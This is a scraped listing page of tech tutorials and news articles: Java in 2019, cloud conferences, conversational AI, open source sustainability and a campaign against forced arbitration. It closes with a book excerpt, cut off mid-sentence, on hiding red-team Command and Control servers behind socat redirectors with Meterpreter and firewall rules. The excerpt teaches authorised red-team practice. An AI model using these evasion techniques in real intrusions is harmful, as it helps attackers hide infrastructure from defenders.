Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials

7012 Articles
article-image-7-things-java-programmers-need-to-watch-for-in-2019
Prasad Ramesh
24 Jan 2019
7 min read
Save for later

7 things Java programmers need to watch for in 2019

Prasad Ramesh
24 Jan 2019
7 min read
Java is one of the most popular and widely used programming languages in the world. Its dominance of the TIOBE index ranking is unmatched for the most part, holding the number 1 position for almost 20 years. Although Java’s dominance is unlikely to waver over the next 12 months, there are many important issues and announcements that will demand the attention of Java developers. So, get ready for 2019 with this list of key things in the Java world to watch out for. #1 Commercial Java SE users will now need a license Perhaps the most important change for Java in 2019 is that commercial users will have to pay a license fee to use Java SE from February. This move comes in as Oracle decided to change the support model for the Java language. This change currently affects Java SE 8 which is an LTS release with premier and extended support up to March 2022 and 2025 respectively. For individual users, however, the support and updates will continue till December 2020. The recently released Java SE 11 will also have long term support with five and extended eight-year support from the release date. #2 The Java 12 release in March 2019 Since Oracle changed their support model, non-LTS version releases will be bi-yearly and probably won’t contain many major changes. JDK 12 is non-LTS, that is not to say that the changes in it are trivial, it comes with its own set of new features. It will be generally available in March this year and supported until September which is when Java 13 will be released. Java 12 will have a couple of new features, some of them are approved to ship in its March release and some are under discussion. #3 Java 13 release slated for September 2019, with early access out now So far, there is very little information about Java 13. All we really know at the moment is that it’s’ due to be released in September 2019. Like Java 12, Java 13 will be a non-LTS release. However, if you want an early insight, there is an early access build available to test right now. Some of the JEP (JDK Enhancement Proposals) in the next section may be set to be featured in Java 13, but that’s just speculation. https://twitter.com/OpenJDK/status/1082200155854639104 #4 A bunch of new features in Java in 2019 Even though the major long term support version of Java, Java 11, was released last year, releases this year also have some new noteworthy features in store. Let’s take a look at what the two releases this year might have. Confirmed candidates for Java 12 A new low pause time compiler called Shenandoah is added to cause minimal interruption when a program is running. It is added to match modern computing resources. The pause time will be the same irrespective of the heap size which is achieved by reducing GC pause times. The Microbenchmark Suite feature will make it easier for developers to run existing testing benchmarks or create new ones. Revamped switch statements should help simplify the process of writing code. It essentially means the switch statement can also be used as an expression. The JVM Constants API will, the OpenJDK website explains, “introduce a new API to model nominal descriptions of key class-file and run-time artifacts”. Integrated with Java 12 is one AArch64 port, instead of two. Default CDS Archives. G1 mixed collections. Other features that may not be out with Java 12 Raw string literals will be added to Java. A Packaging Tool, designed to make it easier to install and run a self-contained Java application on a native platform. Limit Speculative Execution to help both developers and operations engineers more effectively secure applications against speculative-execution vulnerabilities. #5 More contributions and features with OpenJDK OpenJDK is an open source implementation of Java standard edition (Java SE) which has contributions from both Oracle and the open-source community. As of now, the binaries of OpenJDK are available for the newest LTS release, Java 11. Even the life cycles of OpenJDK 7 and 8 have been extended to June 2020 and 2023 respectively. This suggests that Oracle does seem to be interested in the idea of open source and community participation. And why would it not be? Many valuable contributions come from the open source community. Microsoft seems to have benefitted from open sourcing with the incoming submissions. Although Oracle will not support these versions after six months from initial release, Red Hat will be extending support. As the chief architect of the Java platform, Mark Reinhold said stewards are the true leaders who can shape what Java should be as a language. These stewards can propose new JEPs, bring new OpenJDK problems to notice leading to more JEPs and contribute to the language overall. #6 Mobile and machine learning job opportunities In the mobile ecosystem, especially Android, Java is still the most widely used language. Yes, there’s Kotlin, but it is still relatively new. Many developers are yet to adopt the new language. According to an estimated by Indeed, the average salary of a Java developer is about $100K in the U.S. With the Android ecosystem growing rapidly over the last decade, it’s not hard to see what’s driving Java’s value. But Java - and the broader Java ecosystem - are about much more than mobile. Although Java’s importance in enterprise application development is well known, it's also used in machine learning and artificial intelligence. Even if Python is arguably the most used language in this area, Java does have its own set of libraries and is used a lot in enterprise environments. Deeplearning4j, Neuroph, Weka, OpenNLP, RapidMiner, RL4J etc are some of the popular Java libraries in artificial intelligence. #7 Java conferences in 2019 Now that we’ve talked about the language, possible releases and new features let’s take a look at the conferences that are going to take place in 2019. Conferences are a good medium to hear top professionals present, speak, and programmers to socialize. Even if you can’t attend, they are important fixtures in the calendar for anyone interested in following releases and debates in Java. Here are some of the major Java conferences in 2019 worth checking out: JAX is a Java architecture and software innovation conference. To be held in Mainz, Germany happening May 6–10 this year, the Expo is from May 7 to 9. Other than Java, topics like agile, Cloud, Kubernetes, DevOps, microservices and machine learning are also a part of this event. They’re offering discounts on passes till February 14. JBCNConf is happening in Barcelona, Spain from May 27. It will be a three-day conference with talks from notable Java champions. The focus of the conference is on Java, JVM, and open-source technologies. Jfokus is a developer-centric conference taking place in Stockholm, Sweden. It will be a three-day event from February 4-6. Speakers include the Java language architect, Brian Goetz from Oracle and many other notable experts. The conference will include Java, of course, Frontend & Web, cloud and DevOps, IoT and AI, and future trends. One of the biggest conferences is JavaZone attracting thousands of visitors and hundreds of speakers will be 18 years old this year. Usually held in Oslo, Norway in the month of September. Their website for 2019 is not active at the time of writing, you can check out last year’s website. Javaland will feature lectures, training, and community activities. Held in Bruehl, Germany from March 19 to 21 attendees can also exhibit at this conference. If you’re working in or around Java this year, there’s clearly a lot to look forward to - as well as a few unanswered questions about the evolution of the language in the future. While these changes might not impact the way you work in the immediate term, keeping on top of what’s happening and what key figures are saying will set you up nicely for the future. 4 key findings from The State of JavaScript 2018 developer survey Netflix adopts Spring Boot as its core Java framework Java 11 is here with TLS 1.3, Unicode 11, and more updates
Read more
  • 0
  • 0
  • 22949

article-image-the-10-best-cloud-and-infrastructure-conferences-happening-in-2019
Sugandha Lahoti
23 Jan 2019
11 min read
Save for later

The 10 best cloud and infrastructure conferences happening in 2019

Sugandha Lahoti
23 Jan 2019
11 min read
The latest Gartner report suggests that the cloud market is going to grow an astonishing 17.3% ($206 billion) in 2019, up from $175.8 billion in 2018. By 2022, the report claims, 90% of organizations will be using cloud services. But the cloud isn’t one thing, and 2019 is likely to bring the diversity of solutions, from hybrid to multi-cloud, to serverless, to the fore. With such a mix of opportunities and emerging trends, it’s going to be essential to keep a close eye on key cloud computing and software infrastructure conferences throughout the year. These are the events where we’ll hear the most important announcements, and they’ll probably also be the place where the most important conversations happen too. But with so many cloud computing conferences dotted throughout the year, it’s hard to know where to focus your attention. For that very reason, we’ve put together a list of some of the best cloud computing conferences taking place in 2019. #1 Google Cloud Next When and where is Google Cloud Next 2019 happening? April 9-11 at the Moscone Center in San Francisco. What is it? This is Google’s annual global conference focusing on the company’s cloud services and products, namely Google Cloud Platform. At previous events, Google has announced enterprise products such as G Suite and Developer Tools. The three-day conference features demonstrations, keynotes, announcements, conversations, and boot camps. What’s happening at Google Cloud Next 2019? This year Google Cloud Next has more than 450 sessions scheduled. You can also meet directly with Google experts in artificial intelligence and machine learning, security, and software infrastructure. Themes covered this year include application development, architecture, collaboration, and productivity, compute, cost management, DevOps and SRE, hybrid cloud, and serverless. The conference may also serve as a debut platform for new Google Cloud CEO Thomas Kurian. Who’s it for? The event is a not-to-miss event for IT professionals and engineers, but it will also likely attract entrepreneurs. For those of us who won’t attend, Google Cloud Next will certainly be one of the most important conferences to follow. Early bird registration begins from March 1 for $999. #2 OpenStack Infrastructure Summit When and where is OpenStack Infrastructure Summit 2019 happening? April 29 - May 1 in Denver. What is it? The OpenStack Infrastructure Summit, previously the OpenStack Summit, is focused on open infrastructure integration and has evolved over the years to cover more than 30 different open source projects.  The event is structured around use cases, training, and related open source projects. The summit also conducts Project Teams Gathering, just after the main conference (this year May 2-4). PTG provides meeting facilities, allowing various technical teams contributing to OSF (Open Science Framework) projects to meet in person, exchange ideas and get work done in a productive setting. What’s happening at this year’s OpenStack Infrastructure Summit? This year the summit is expected to have almost 300 sessions and workshops on Container Infrastructure, CI/CD, Telecom + NFV, Public Cloud, Private & Hybrid Cloud, Security etc. The Summit is going to have members of open source communities like Airship, Ansible, Ceph, Docker, Kata Containers, Kubernetes, ONAP, OpenStack, Open vSwitch, OPNFV, StarlingX, Zuul among other topics. Who’s it for? This is an event for engineers working in operations and administration. If you’re interested in OpenStack and how the foundation fits into the modern cloud landscape there will certainly be something here for you. #3 DockerCon When and where is DockerCon 2019 happening? April 29 to May 2 at Moscone West, San Francisco. What is it? DockerCon is perhaps the container event of the year. The focus is on what’s happening across the Docker world, but it will offer plenty of opportunities to explore the ways Docker is interacting and evolving with a wider ecosystem of tools. What’s happening at DockerCon 2019? This three-day conference will feature networking opportunities and hands-on labs. It will also hold an exposition where innovators will showcase their latest products. It’s expected to have over 6,000 attendees with 5+ tracks and 100 sessions. You’ll also have the opportunity to become a Docker Certified Associate with an on-venue test. Who’s it for? The event is essential for anyone working in and around containers - so DevOps, SRE, administration and infrastructure engineers. Of course, with Docker finding its way into the toolsets of a variety of roles, it may be useful for people who want to understand how Docker might change the way they work in the future.  Pricing for DockerCon runs from around $1080 for early-bird reservations to $1350 for standard tickets. #4 Red Hat Summit When and where is Red Hat Summit 2019 happening? May 7–9 in Boston. What is it? Red Hat Summit is an open source technology event run by Red Hat. It covers a wide range of topics and issues, essentially providing a snapshot of where the open source world is at the moment and where it might be going. With open source shaping cloud and other related trends, it’s easy to see why the event could be important for anyone with an interest in cloud and infrastructure. What’s happening at Red Hat Summit 2019? The theme for this year is AND. The copy on the event’s website reads:  AND is about scaling your technology and culture in whatever size or direction you need, when you need to, with what you actually need―not a bunch of bulky add-ons. From the right foundation―an open foundation―AND adapts with you. It’s interoperable, adjustable, elastic. Think Linux AND Containers. Think public AND private cloud. Think Red Hat AND you. There’s clearly an interesting conceptual proposition at the center of this year’s event that hints at how Red Hat wants to get engineers and technology buyers to think about the tools they use and how they use them. Who’s it for? The event is big for any admin or engineer that works with open source technology - Linux in particular (so, quite a lot of people…). Given Red Hat was bought by IBM just a few months ago in 2018, this event will certainly be worth watching for anyone interested in the evolution of both companies as well as open source software more broadly. #5 KubeCon + CloudNativeCon Europe When and where is KubeCon + CloudNativeCon Europe 2019? May 20 to 23 at Fira Barcelona. What is it? KubeCon + CloudNativeCon is CCNF’s (Cloud Native Computing Foundation) flagship conference for open source and cloud-native communities. It features contributors from cloud-native applications and computing, containers, microservices, central orchestration processing, and related projects to further cloud-native education of technologies that support the cloud-native ecosystem. What’s happening at this year’s KubeCon? The conference will feature a range of events and sessions from industry experts, project leaders, as well as sponsors. The details of the conference still need development, but the focus will be on projects such as Kubernetes (obviously), Prometheus, Linkerd, and CoreDNS. Who’s it for? The conference is relevant to anyone with an interest in software infrastructure. It’s likely to be instructive and insightful for those working in SRE, DevOps and administration, but because of Kubernetes importance in cloud native practices, there will be something here for many others in the technology industry. . The cost is unconfirmed, but it can be anywhere between $150 and $1,100. #6 IEEE International Conference on Cloud Computing When and where is the IEEE International Conference on Cloud Computing? July 8-13 in Milan. What is it? This is an IEEE conference solely dedicated to Cloud computing. IEEE Cloud is basically for research practitioners to exchange their findings on the latest cloud computing advances. It includes findings across all “as a service” categories, including network, infrastructure, platform, software, and function. What’s happening at the IEEE International Conference on Cloud Computing? IEEE cloud 2019 invites original research papers addressing all aspects of cloud computing technology, systems, applications, and business innovations. These are mostly based on technical topics including cloud as a service, cloud applications, cloud infrastructure, cloud computing architectures, cloud management, and operations. Shangguang Wang and Stephan Reiff-Marganiec have been appointed as congress workshops chairs. Featured keynote speakers for the 2019 World Congress on Services include Kathryn Guarini, VP at IBM Industry Research and Joseph Sifakis, the Emeritus Senior CNRS Researcher at Verimag. Who’s it for? The conference has a more academic bent than the others on this list. That means it’s particularly important for researchers in the field, but there will undoubtedly be lots here for industry practitioners that want to find new perspectives on the relationship between cloud computing and business. #7 VMworld When and where is VMWorld 2019? August 25 - 29 in San Francisco. What is it? VMworld is a virtualization and cloud computing conference, hosted by VMware. It is the largest virtualization-specific event. VMware CEO Pat Gelsinger and the executive team typically provide updates on the company’s various business strategies, including multi-cloud management, VMware Cloud for AWS, end-user productivity, security, mobile, and other efforts. What’s happening at VMworld 2019? The 5-day conference starts with general sessions on IT and business. It then goes deeper into breakout sessions, expert panels, and quick talks. It also holds various VMware Hands-on Labs and VMware Certification opportunities as well as one-on-one appointments with in-house experts. The expected attendee is over 21000+. Who’s it for? VMworld maybe doesn’t have the glitz and glamor of an event like DockerCon or KubeCon, but for administrators and technological decision makers that have an interest in VMware’s products and services. #8 Microsoft Ignite When and where is Microsoft Ignite 2019? November 4-8 at Orlando, Florida What is it? Ignite is Microsoft's flagship enterprise event for everything cloud, data, business intelligence, teamwork, and productivity. What’s happening at Microsoft Ignite 2019? Microsoft Ignite 2019 is expected to feature almost 700 + deep-dive sessions and 100 + expert-led and self-paced workshops. The full agenda will be posted sometime in Spring 2019. You can pre-register for Ignite 2019 here. Microsoft will also be touring many cities around the world to bring the Ignite experience to more people. Who’s it for? The event should have wide appeal, and will likely reflect Microsoft’s efforts to bring a range of tech professionals into the ecosystem. Whether you’re a developer, infrastructure engineer, or operations manager, Ignite is, at the very least, an event you should pay attention to. #9 Dreamforce When and where is Dreamforce 2019? November 19-22, in San Francisco. What is it? Dreamforce, hosted by Salesforce, is a truly huge conference, attended by more than 100,000 people.. Focusing on Salesforce and CRM, the event is an opportunity to learn from experts, share experiences and ideas, and to stay up to speed with the trends in the field, like automation and artificial intelligence. What’s happening at Dreamforce 2019? Dreamforce covers over 25 keynotes, a vast range of breakout sessions (almost 2700) and plenty of opportunities for networking. The conference is so extensive that it has its own app to help delegates manage their agenda and navigate venues. Who’s it for? Dreamforce is primarily about Salesforce - for that reason, it’s very much an event for customers and users. But given the size of the event, it also offers a great deal of insight on how businesses are using SaaS products and what they expect from them. This means there is plenty for those working in more technical or product roles to learn at the event.. #10 Amazon re:invent When and where is Amazon re:invent 2019? December 2-6 at The Venetian, Las Vegas, USA What is it? Amazon re:invent is hosted by AWS. If you’ve been living on mars in recent years, AWS is the market leader when it comes to cloud. The event, then, is AWS’ opportunity to set the agenda for the cloud landscape, announcing updates and new features, as well as an opportunity to discuss the future of the platform. What’s happening at Amazon re:invent 2019? Around 40,000 people typically attend Amazon’s top cloud event.  Amazon Web Services and its cloud-focused partners typically reveal product releases on several fronts. Some of these include enterprise security, Transit Virtual Private Cloud service, and general releases. This year, Amazon is also launching a related conference dedicated exclusively to cloud security called re:Inforce. The inaugural event will take place in Boston on June 25th and 26th, 2019 at the Boston Convention and Exhibition Center. Who’s it for? The conference attracts Amazon’s top customers, software distribution partners (ISVs) and public cloud MSPs. The event is essential for developers and engineers, administrators, architects, and decision makers. Given the importance of AWS in the broader technology ecosystem, this is an event that will be well worth tracking, wherever you are in the world. Did we miss an important cloud computing conference? Are you attending any of these this year? Let us know in the comments – we’d love to hear from you. Also, check this space for more detailed coverage of the conferences. Cloud computing trends in 2019 Key trends in software development in 2019: cloud native and the shrinking stack Key trends in software infrastructure in 2019: observability, chaos, and cloud complexity
Read more
  • 0
  • 0
  • 35821

article-image-conversational-ai-in-2018-an-arms-race-of-new-products-acquisitions-and-more
Bhagyashree R
21 Jan 2019
5 min read
Save for later

Conversational AI in 2018: An arms race of new products, acquisitions, and more

Bhagyashree R
21 Jan 2019
5 min read
Conversational AI is one of the most interesting applications of artificial intelligence in recent years. While the trend isn’t yet ubiquitous in the way that recommendation systems are (perhaps unsurprising), it has been successfully productized by a number of tech giants, in the form of Google Home and Amazon Echo (which is ‘powered by’ Alexa). The conversational AI arms race Arguably, 2018 has seen a bit of an arms race in conversational AI. As well as Google and Amazon, the likes of IBM, Microsoft, and Apple have wanted a piece of the action. Here are some of the new conversational AI tools and products these companies introduced this year: Google Google worked towards enhancing its conversational interface development platform, Dialogflow. In July, at the Google Cloud Next event, it announced several improvements and new capabilities to Dialogflow including Text to Speech via DeepMind's WaveNet and Dialogflow Phone Gateway for telephony integration. It also launched a new product called Contact Center AI that comes with Dialogflow Enterprise Edition and additional capabilities to assist live agents and perform analytics. Google Assistant became better in having a back-and-forth conversation with the help of Continued Conversation, which was unveiled at the Google I/O conference. The assistant became multilingual in August, which means users can speak to it in more than one language at a time, without having to adjust their language settings. Users can enable this multilingual functionality by selecting two of the supported languages. Following the footsteps of Amazon, Google also launched its own smart display named Google Home Hub at the ‘Made by Google’ event held in October. Microsoft Microsoft in 2018 introduced and improved various bot-building tools for developers. In May, at the Build conference, Microsoft announced major updates in their conversational AI tools: Azure Bot Service, Microsoft Cognitive Services Language Understanding, and QnAMaker. To enable intelligent bots to learn from example interactions and handle common small talk, it launched new experimental projects from named Conversation Learner and Personality Chat. At Microsoft Ignite, Bot Framework SDK V4.0 was made generally available. Later in November, Microsoft announced the general availability of the Bot Framework Emulator V4 and Web Chat control. In May, to drive more research and development in its conversational AI products, Microsoft acquired Semantic Machines and established conversational AI center of excellence in Berkeley. In November, the organization's acquisition of Austin-based bot startup XOXCO was a clear indication that it wants to get serious about using artificial intelligence for conversational bots. Producing guidelines on developing ‘responsible’ conversational AI further confirmed Microsoft wants to play a big part in the future evolution of the area. Microsoft were the chosen tech partner by UK based conversational AI startup ICS.ai. The team at ICS are using Azure and LUIS from Microsoft in their public sector AI chatbots, aimed at higher education, healthcare trusts and county councils. Amazon Amazon with the aims to improve Alexa’s capabilities released Alexa Skills Kit (ASK) which consists of APIs, tools, documentation, and code samples using which developers can build new skills for Alexa. In September, it announced a preview of a new design language named Alexa Presentation Language (APL). With APL, developers can build visual skills that include graphics, images, slideshows, and video, and to customize them for different device types. Amazon’s smart speaker Echo Dot saw amazing success with becoming the best seller in smart speaker category on Amazon. At its 2018 hardware event in Seattle, Amazon announced the launch of redesigned Echo Dot and a new addition to Alexa-powered A/V device called Echo Plus. As well as the continuing success of Alexa and the Amazon Echo, Amazon’s decision to launch the Alexa Fellowship at a number of leading academic institutions also highlights that for the biggest companies conversational AI is as much about research and exploration as it is products. Like Microsoft, it appears that Amazon is well aware that conversational AI is an area only in its infancy, still in development - as much as great products, it requires clear thinking and cutting-edge insight to ensure that it develops in a way that is both safe and impactful. What’s next? This huge array of products is a result of advances in deep learning researches. Now conversational AI is not just limited to small tasks like setting an alarm or searching the best restaurant. We can have a back and forth conversation with the conversational agent. But, needless to say, it still needs more work. Conversational agents are yet to meet user expectations related to sensing and responding with emotion. In the coming years, we will see these systems understand and do a good job at generating natural language. They will be able to have reasonably natural conversations with humans in certain domains, grounded in context. Also, the continuous development in IoT will provide AI systems with more context. Apple has introduced Shortcuts for iOS 12 to automate your everyday tasks Microsoft amplifies focus on conversational AI: Acquires XOXCO; shares guide to developing responsible bots Amazon is supporting research into conversational AI with Alexa fellowships
Read more
  • 0
  • 0
  • 21786

article-image-github-wants-to-improve-open-source-sustainability-invites-maintainers-to-talk-about-their-oss-challenges
Sugandha Lahoti
18 Jan 2019
4 min read
Save for later

Github wants to improve Open Source sustainability; invites maintainers to talk about their OSS challenges

Sugandha Lahoti
18 Jan 2019
4 min read
Open Source Sustainability is an essential and special part of free and open software development. Open source contributors and maintainers build tools and technologies for everyone, but they’ don’t get enough resources, tools, and environment. If anything goes wrong with the project, it is generally the system contributors who are responsible for it. In reality, however, contributors, and maintainers together are equally responsible. Yesterday, Devon Zuegel, the open source product manager at GitHub penned a blog post talking about open source sustainability and what are the issues current open source maintainers face while trying to contribute to open source. The major thing holding back OSS is the work overload that maintainers face. The OS community generally consists of maintainers who are working at some other organization while also maintaining the open source projects mostly in their free time. This leaves little room for software creators to have economic gain from their projects and compensate for costs and people required to maintain their projects. This calls for companies and individuals to donate to these maintainers on GitHub. As a hacker news user points out, “ I think this would be a huge incentive for people to continue their work long-term and not just "hand over" repositories to people with ulterior motives.” Another said, “Integrating bug bounties and donations into GitHub could be one of the best things to happen to Open Source. Funding new features and bug fixes could become seamless, and it would sway more devs to adopt this model for their projects.” Another major challenge is the abuse and frustration that maintainers have to go on a daily basis. As Devon writes on her blog, “No one deserves abuse. OSS contributors are often on the receiving end of harassment, demands, and general disrespect, even as they volunteer their time to the community.”  What is required is to educate people and also build some kind of moderation for trolls like a small barrier to entry. Apart from that maintainers should also be given expanded visibility into how their software is used. Currently, they are only given access to download statistics. There should be a proper governance model that should be regularly updated based on the what decisions team makes, delegates, and communicates. As Adam Jacob founder of SFOSC (Sustainable Free and Open Source Communities) points out, “I believe we need to start talking about Open Source, not in terms of licensing models, or business models (though those things matter): instead, we should be talking about whether or not we are building sustainable communities. What brings us together, as people, in this common effort around the software? What rights do we hold true for each other? What rights are we willing to trade in order to see more of the software in the world, through the investment of capital?” SFOSC is established to discuss the principles that lead to sustainable communities, to develop clear social contracts communities can use, and educate Open Source companies on which business models can create true communities. As with SFOSC, Github also wants to better understand the woes of maintainers from their own experiences and hence the blog. Devon wants to support the people behind OSS at Github inviting people to have an open dialogue with the GitHub community solving nuanced and unique challenges that the current OSS community face. She has created a contact form asking open source contributors or maintainer to join the conversation and share their problems. Open Source Software: Are maintainers the only ones responsible for software sustainability? We need to encourage the meta-conversation around open source, says Nadia Eghbal [Interview] EU to sponsor bug bounty programs for 14 open source projects from January 2019
Read more
  • 0
  • 0
  • 13379

article-image-googlers-launch-industry-wide-awareness-campaign-to-fight-against-forced-arbitration
Natasha Mathur
17 Jan 2019
6 min read
Save for later

Googlers launch industry-wide awareness campaign to fight against forced arbitration

Natasha Mathur
17 Jan 2019
6 min read
A group of Googlers launched a public awareness social media campaign from 9 AM to 6 PM EST yesterday. The group, called, ‘Googlers for ending forced arbitration’ shared information about arbitration on their Twitter and Instagram accounts throughout the day. https://twitter.com/endforcedarb/status/1084813222505410560 The group tweeted out yesterday, as part of the campaign, that in surveying employees of 30+ tech companies and 10+ common Temp/Contractor suppliers in the industry, none of them could meet the three primary criteria needed for a transparent workplace. The three basic criteria include: optional arbitration policy for all employees and for all forms of discrimination (including contractors/temps), no class action waivers, and no gag rule that keeps arbitration hearings proceedings confidential. The group shared some hard facts about Arbitration and also busted myths regarding the same. Let’s have a look at some of the key highlights from yesterday’s campaign. At least 60 million Americans are forced to use arbitration The group states that the implementation of forced arbitration policy has grown significantly in the past seven years. Over 65% of the companies consisting of 1,000 or more employees, now have mandatory arbitration procedures. Employees don’t have an option to take their employers to court in cases of harassment or discrimination. People of colour and women are often the ones who get affected the most by this practice.           How employers use forced Arbitration Forced arbitration is extremely unfair Arbitration firms that are hired by the companies usually always favour the companies over its employees. This is due to the fear of being rejected the next time by an employer lest the arbitration firm decides to favour the employee. The group states that employees are 1.7 times more likely to win in Federal courts and 2.6 times more likely to win in state courts than in arbitration.   There are no public filings of the complaint details, meaning that the company won’t have anyone to answer to regarding the issues within the organization. The company can also limit its obligation when it comes to disclosing the evidence that you need to prove your case.   Arbitration hearings happen behind closed doors within a company When it comes to arbitration hearings, it's just an employee and their lawyer, other party and their lawyer, along with a panel of one to three arbitrators. Each party gets to pick one arbitrator each, who is also hired by your employers. However, there’s usually only a single arbitrator panel involved as three-arbitrator panel costs five times more than a single arbitrator panel, as per the American Arbitration Association. Forced Arbitration requires employees to sign away their right to class action lawsuits at the start of the employment itself The group states that irrespective of having legal disputes or not, forced arbitration bans employees from coming together as a group in case of arbitration as well as in case of class action lawsuits. Most employers also practice “gag rule” which restricts the employee to even talk about their experience with the arbitration policy. There are certain companies that do give you an option to opt out of forced arbitration using an opt-out form but comes with a time constraint depending on your agreement with that company. For instance, companies such as Twitter, Facebook, and Adecco give their employees a chance to opt out of forced arbitration.                                                  Arbitration opt-out option JAMS and AAA are among the top arbitration organizations used by major tech giants JAMS, Judicial Arbitration and Mediation Services, is a private company that is used by employers like Google, Airbnb, Uber, Tesla, and VMware. JAMS does not publicly disclose the diversity of its arbitrators. Similarly, AAA, America Arbitration Association, is a non-profit organization where usually retired judges or lawyers serve as arbitrators. Arbitrators in AAA have an overall composition of 24% women and minorities. AAA is one of the largest arbitration organizations used by companies such as Facebook, Lyft, Oracle, Samsung, and Two Sigma.   Katherine Stone, a professor from UCLA law school, states that the procedure followed by these arbitration firms don’t allow much discovery. What this means is that these firms don’t usually permit depositions or various kinds of document exchange before the hearing. “So, the worker goes into the hearing...armed with nothing, other than their own individual grievances, their own individual complaints, and their own individual experience. They can’t learn about the experience of others,” says Stone. Female workers and African-American workers are most likely to suffer from forced arbitration 58% female workers and 59% African American workers face mandatory arbitration depending on the workgroups. For instance, in the construction industry, which is a highly male-dominated industry, the imposition of forced arbitration is at the lowest rate. But, in the education and health industries, which has the majority of the female workforce, the imposition rate of forced arbitration is high.                                 Forced Arbitration rate among different workgroups Supreme Court has gradually allowed companies to expand arbitration to employees & consumers The group states that the 1925 Federal Arbitration Act (FAA) had legalized arbitration between shipping companies in cases of settling commercial disputes. The supreme court, however, expanded this practice of arbitration to companies too.                                                   Supreme court decisions Apart from sharing these facts, the group also shed insight on dos and don’t that employees should follow under forced arbitration clauses.                                                      Dos and Dont’s The social media campaign by Googlers for forced arbitration represents an upsurge in the strength and courage among the employees within the tech industry as not just the Google employees but also employees from different tech companies shared their experience regarding forced arbitration. The group had researched academic institutions, labour attorneys, advocacy groups, etc, and the contracts of around 30 major tech companies, as a part of the campaign. To follow all the highlights from the campaign, follow the End Forced Arbitration Twitter account. Shareholders sue Alphabet’s board members for protecting senior execs accused of sexual harassment Recode Decode #GoogleWalkout interview shows why data and evidence don’t always lead to right decisions in even the world’s most data-driven company Tech Workers Coalition volunteers talk unionization and solidarity in Silicon Valley
Read more
  • 0
  • 0
  • 15985

article-image-obfuscating-command-and-control-c2-servers-securely-with-redirectors-tutorial
Amrata Joshi
16 Jan 2019
11 min read
Save for later

Obfuscating Command and Control (C2) servers securely with Redirectors [Tutorial]

Amrata Joshi
16 Jan 2019
11 min read
A redirector server is responsible for redirecting all the communication to the C2 server. Let's explore the basics of redirector using a simple example. Take a scenario in which we have already configured our team server and we're waiting for an incoming Meterpreter connection on port 8080/tcp. Here, the payload is delivered to the target and has been executed successfully. This article is an excerpt taken from the book Hands-On Red Team Tactics written by Himanshu Sharma and Harpreet Singh. This book covers advanced methods of post-exploitation using Cobalt Strike and introduces you to Command and Control (C2) servers and redirectors. In this article, you will understand the basics of redirectors, the process of obfuscating C2 securely, domain fronting and much more. To follow are the things that will happen next: On payload execution, the target server will try to connect to our C2 on port 8080/tcp. Upon successful connection, our C2 will send the second stage as follows: A Meterpreter session will then open and we can access this using Armitage: However, the target server's connection table will have our C2s IP in it. This means that the monitoring team can easily get our C2 IP and block it: Here's the current situation. This is displayed in an architectural format in order to aid understanding: To protect our C2 from being burned, we need to add a redirector in front of our C2. Refer to the following image for a clear understanding of this process: This is currently the IP information of our redirector and C2: Redirector IP: 35.153.183.204 C2 IP: 54.166.109.171 Assuming that socat is installed on the redirector server, we will execute the following command to forward all the communications on the incoming port 8080/tcp to our C2: Our redirector is now ready. Now let's generate a one-liner payload with a small change. This time, the lhost will be set to the redirector IP instead of the C2: Upon execution of the payload, the connection will initiate from the target server and the server will try to connect with the redirector: We might now notice something different about the following image as the source IP is redirector instead of the target server: Let's take a look at the connection table of the target server: The connection table doesn't have our C2 IP and neither does the Blue team. Now the redirector is working perfectly, what could be the issue with this C2-redirector setup? Let's perform a port scan on the C2 to check the available open ports: As we can see from the preceding screenshot, port 8080/tcp is open on our C2. This means that anyone can try to connect to our listener in order to confirm its existence. To avoid situations like this, we should configure our C2 in such a way that allows us to protect it from outside reconnaissance (recon) and attacks. Obfuscating C2 securely To put it in a diagrammatic format, our current C2 configuration is this: If someone tries to connect to our C2 server, they will be able to detect that our C2 server is running a Meterpreter handler on port 8080/tcp: To protect our C2 server from outside scanning and recon, let's set the following Uncomplicated Firewall (UFW) ruleset so that only our redirector can connect to our C2. To begin, execute the following UFW commands to add firewall rules for C2: sudo ufw allow 22 sudo ufw allow 55553 sudo ufw allow from 35.153.183.204 to any port 8080 proto tcp sudo ufw allow out to 35.153.183.204 port 8080 proto tcp sudo ufw deny out to any The given commands needs to be executed and the result is shown in the following screenshot: In addition, execute the following ufw commands to add firewall rules for redirector as well: sudo ufw allow 22 sudo ufw allow 8080 The given commands needs to be executed and the result is shown in the following screenshot: Once the ruleset is in place, this can be described as follows: If we try to perform a port scan on the C2 now, the ports will be shown as filtered: as shown below. Furthermore, our C2 is only accessible from our redirector now. Let's also confirm this by doing a port scan on our C2 from redirector server: Short-term and long-term redirectors Short-term (ST)—also called short haul—C2 are those C2 servers on which the beaconing process will continue. Whenever a system in the targeted organization executes our payload, the server will connect with the ST-C2 server. The payload will periodically poll for tasks from our C2 server, meaning that the target will call back to the ST-C2 server every few seconds. The redirector placed in front of our ST-C2 server is called the short-term (ST) redirector. This is responsible for handling ST-C2 server connections on which the ST-C2 will be used for executing commands on the target server in real time. ST and LT redirectors would get caught easily during the course of engagement because they're placed at the front. Long-term (LT)—also known as long-haul—C2 server is where the callbacks received from the target server will be after every few hours or days. The redirector placed in front of our LT-C2 server is called a long-term (LT) redirector. This redirector is used to maintain access for a longer period of time than ST redirectors. When performing persistence via the ST-C2 server, we need to provide the domain of our LT redirector so that the persistence module running on the target server will connect back to the LT redirector instead of the ST redirector. A segregated red team infrastructure setup would look something like this: Source: https://payatu.com/wp-content/uploads/2018/08/redteam_infra.png Once we have a proper red team infrastructure setup, we can focus on the kind of redirection we want to have in our ST and LT redirectors. Redirection methods There are two ways in which we can perform redirection: Dumb pipe redirection Filtration/smart redirection Dumb pipe redirection The dumb pipe redirectors blindly forward the network traffic from the target server to our C2, or vice-versa. This type of redirector is useful for quick configuration and setup, but they lack a level of control over the incoming traffic. Dumb pipe redirection will obfuscate (hide) the real IP of our C2, but won't it distract the defenders of the organization from investigating our setup. We can perform dumb pipe redirection using socat or iptables. In both cases, the network traffic will be redirected either to our ST-C2 server or LT-C2 server. Source: https://payatu.com/wp-content/uploads/2018/08/dumb_pipe_redirection123.png Let's execute the command given in the following image in 